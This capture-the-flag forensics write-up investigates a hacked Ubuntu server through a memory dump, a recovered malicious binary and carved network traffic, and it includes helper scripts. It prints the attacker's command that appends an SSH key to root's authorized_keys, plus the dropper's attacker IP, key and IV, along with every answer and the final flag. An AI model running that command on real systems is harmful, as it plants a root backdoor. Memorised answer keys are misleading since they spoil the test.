Gemastik 18 Quals
Write-up for Gemastik's Cyber Security division qualification.
Hacked
I have a Linux server and it looks like it's been hacked... Please help me analyze the attachment I've provided and answer all the questions.
In this challenge, we're given a Linux memory dump, which we can analyze with Volatility 3. A Linux dump needs a matching symbol file: many distributions exist and each ships its own kernel builds, so there is no single layout Volatility can assume.
Volatility uses what's called a symbol table (an ISF JSON file) to understand the memory layout of the kernel that was running. Because each kernel version and distribution can have different internal data structures, we must obtain the symbol table for the exact kernel from which the memory dump was taken. The documentation explains how to create one with dwarf2json from the kernel's debug symbols. If a matching symbol table isn't readily available for your distribution, you can often find a prebuilt one in a community-maintained repository such as https://github.com/Abyss-W4tcher/volatility3-symbols.
To find out which distribution and kernel version the memory dump came from, we can run the banners.Banners plugin, which scans the image for Linux version banners.

Now that we know the dump is from Ubuntu and which exact kernel version it runs, we can download the matching symbol file from the repository mentioned above and continue the analysis.
To use the symbol file, create a new directory next to the memory dump and put the .json.xz file in a linux/ subdirectory of it (Volatility looks for Linux symbol tables under linux/). Then add -s <directory name> every time we run a plugin.
The challenge is a series of questions; answering all of them yields the flag, so let's analyse the dump and work through them.
- Repository used by threat actors 
To find the repository, check the bash history: cloning a repository normally means running git clone, so the URL should still be in the history. The linux.bash plugin recovers the bash history from the memory of the bash processes in the dump.

Then, the answer is https://github.com/walawe1337-oss/simple-python-server 
- MD5 hash of malicious files (lower case) 
Once we have the repository URL, we can clone it and obtain the binaries. The binaries have since been deleted from the repository, but the commit that added them still exists in the history, so we can check out the earlier commit (the parent of the commit that removed them) and recover them.


Based on that, the md5sum of the recovered malicious file is 11e128c2bf2f82f4e966a0ec2ff072bb.
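As an added example (my own script, not part of the write-up or of the repository it analyses), here is how that recovery looks when scripted: list every path that some commit deleted, check each one out from the parent of the deleting commit, and hash it. The repository, the file name dropper.bin and its contents are constructed inside the script so it runs offline; against the real clone you would point deleted_paths and recover_deleted at that checkout instead.

```shell
#!/bin/sh
# Added example (not from the write-up): recover a file that was deleted in a
# later commit of a git repository, then hash it. The repository, the file
# name "dropper.bin" and its contents are constructed here so the script runs
# offline; the real repository on the page is
# https://github.com/walawe1337-oss/simple-python-server.
set -eu

# Build a throwaway repo: a file is added in one commit and removed in the
# next, which is what the deleted malicious binary looked like upstream.
make_demo_repo() {
    dir=$(mktemp -d)
    git -C "$dir" init -q
    git -C "$dir" config user.name demo
    git -C "$dir" config user.email demo@example.invalid
    printf 'print("hello")\n' > "$dir/server.py"
    printf '#!/bin/sh\necho constructed-dropper\n' > "$dir/dropper.bin"
    git -C "$dir" add .
    git -C "$dir" commit -q -m "add server and binary"
    git -C "$dir" rm -q dropper.bin
    git -C "$dir" commit -q -m "remove binary"
    printf '%s\n' "$dir"
}

# List every path that some commit deleted (the "D" diff filter).
deleted_paths() {
    git -C "$1" log --diff-filter=D --name-only --pretty=format: | sed '/^$/d' | sort -u
}

# Restore one deleted path from the parent of the commit that deleted it and
# print "md5  path". Checking out <commit>^ -- <path> leaves the file in the
# working tree, where it can be hashed or loaded into a disassembler.
recover_deleted() {
    repo=$1; path=$2
    commit=$(git -C "$repo" log --diff-filter=D --format=%H -n 1 -- "$path")
    git -C "$repo" checkout -q "${commit}^" -- "$path"
    (cd "$repo" && md5sum "$path")
}

# Print only the hash, lower-case, in the format the challenge asks for.
recovered_md5() {
    recover_deleted "$1" "$2" | cut -d' ' -f1
}

repo=$(make_demo_repo)
for p in $(deleted_paths "$repo"); do
    recover_deleted "$repo" "$p"
done
```

The log filter is what matters: --diff-filter=D restricts the history to commits that deleted something, so the parent of the first hit for a given path is the last revision that still contained the file, even if it was committed long before the deletion.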
- Key and IV used for encryption 
After obtaining the binary, we can open it in a disassembler and decompiler such as IDA, Ghidra, or Binary Ninja.

We can see that the key and the IV are hardcoded in the decompiled program. The key is 32 bytes long, which matches AES-256, and the IV is 16 bytes, one AES block. So the answer for this question is this_is_my_secret_aes_256_key!!!:abcdef1234567890
- The IP and port used by the attacker 
The same screenshot also shows the IP address and port. The IP address is 165.232.133.53, and the port appears as the hex constant 0x3017, which is 12311 in decimal. So the answer is 165.232.133.53:12311
- Commands executed by the threat actor (within the binary) 
The malicious binary does not contain a hardcoded command. Instead, it downloads an encrypted blob of data from the remote server, decrypts it with the hardcoded key and IV, and then executes the decrypted content as a system command. The threat actor's command therefore exists only in the encrypted data retrieved at runtime, which lets the threat actor change the command without rebuilding the binary. The problem is that the server is already down, so we can't fetch the encrypted command ourselves.
See the SANS ISC diary at https://isc.sans.edu/diary/20639 and also this blog. Network traffic that passed through the Ubuntu system before it was dumped can still be carved out of the memory image, and bulk_extractor can do that for us. bulk_extractor is a forensic tool that extracts valuable information from disk images, files, or memory dumps without parsing the file system: it scans for specific patterns such as email addresses, credit card numbers, or, in this case, strings, IP addresses, and network packets, which it reassembles into a pcap file in its output directory.


Now we have the carved network data, which we can open in Wireshark and filter to the attacker IP we found earlier.

We can see that packet 58 is where the encrypted command is captured.

Then, with the key and IV we have and knowing which cipher the binary uses, we can decrypt the command to answer the question.

So, the answer is echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICUHM+DTrehpFANzpOzDPUJi1DYaK1xwMpMLz1QqwxJ0 kali@kali" >> /root/.ssh/authorized_keys
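Added example (my own, not the author's script): decrypting the blob with openssl once the payload has been exported from Wireshark as raw bytes. The page gives the key and IV but does not name the cipher mode, so the script assumes AES-256-CBC with PKCS#7 padding; and because the actual blob from packet 58 is not reproduced on the page, it constructs a sample ciphertext with the same key and IV and decrypts that to show the round trip.

```shell
#!/bin/sh
# Added example (not from the write-up): decrypt the blob that the dropper
# fetched, using the key and IV recovered from the binary. The page gives a
# 32-byte key (AES-256) and a 16-byte IV but does not name the mode; CBC with
# PKCS#7 padding is assumed here, which is what openssl's -aes-256-cbc does.
# The ciphertext is constructed inside this script (encrypted with the same
# key and IV) because the blob from packet 58 is not reproduced on the page.
set -eu

KEY='this_is_my_secret_aes_256_key!!!'   # 32 bytes -> AES-256
IV='abcdef1234567890'                     # 16 bytes -> one AES block
CMD='echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICUHM+DTrehpFANzpOzDPUJi1DYaK1xwMpMLz1QqwxJ0 kali@kali" >> /root/.ssh/authorized_keys'

# Sanity check before decrypting: a wrong key or IV length is the usual reason
# openssl prints "bad decrypt" or emits garbage.
check_params() {
    [ ${#KEY} -eq 32 ] || { echo "key is not 32 bytes" >&2; return 1; }
    [ ${#IV} -eq 16 ] || { echo "iv is not 16 bytes" >&2; return 1; }
}

# openssl enc takes -K and -iv as hex strings, not raw ASCII; convert once.
to_hex() { printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n'; }

# Decrypt a raw ciphertext file (e.g. the TCP payload exported from Wireshark)
# and write the plaintext to stdout.
decrypt_blob() {
    openssl enc -d -aes-256-cbc -K "$(to_hex "$KEY")" -iv "$(to_hex "$IV")" -in "$1"
}

# Constructed stand-in for the captured blob: encrypt a command with the same
# parameters so the round trip can be checked offline. Prints the file path.
make_sample_blob() {
    out=$(mktemp)
    printf '%s' "$1" | openssl enc -aes-256-cbc -K "$(to_hex "$KEY")" -iv "$(to_hex "$IV")" -out "$out"
    printf '%s\n' "$out"
}

check_params
blob=$(make_sample_blob "$CMD")
decrypt_blob "$blob"
echo
```

Against the real capture, export the TCP payload of packet 58 as raw bytes (Follow TCP Stream with "Show data as Raw", or File > Export Packet Bytes) to a file and pass that file to decrypt_blob. If the key and IV are right but openssl reports "bad decrypt" or the output is unreadable, the mode or padding assumption is what to revisit, not the key.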
- MITRE ATT&CK techniques based on previous questions 
The command above appends a new SSH public key to the root user's authorized_keys file, which lists the public keys that are allowed to authenticate to that account over SSH. This maps directly to MITRE ATT&CK technique T1098.004, Account Manipulation: SSH Authorized Keys, a persistence technique. So the answer is T1098.004
Please answer the following questions:
No 1:
Question: Repository used by the threat actor
Format: https://example/path/to/repo
Answer:
[+] Answering question 1: https://github.com/walawe1337-oss/simple-python-server
Correct
No 2:
Question: MD5 hash of the malicious file (lower case)
Format: -
Answer:
[+] Answering question 2: 11e128c2bf2f82f4e966a0ec2ff072bb
Correct
No 3:
Question: Key and IV used for encryption
Format: key:iv
Answer:
[+] Answering question 3: this_is_my_secret_aes_256_key!!!:abcdef1234567890
Correct
No 4:
Question: IP and port used by the attacker
Format: ip:port
Answer:
[+] Answering question 4: 165.232.133.53:12311
Correct
No 5:
Question: Command executed by the threat actor (inside the binary)
Format: -
Answer:
[+] Answering question 5: echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICUHM+DTrehpFANzpOzDPUJi1DYaK1xwMpMLz1QqwxJ0 kali@kali" >> /root/.ssh/authorized_keys
Correct
No 6:
Question: MITRE ATT&CK technique based on the previous questions
Format: T12345.123
Answer:
[+] Answering question 6: T1098.004
Correct
Congrats! Flag: GEMASTIK18{5230e7b97ebd5d1a23d956aae28fbb9d}
[!] Connection closed by server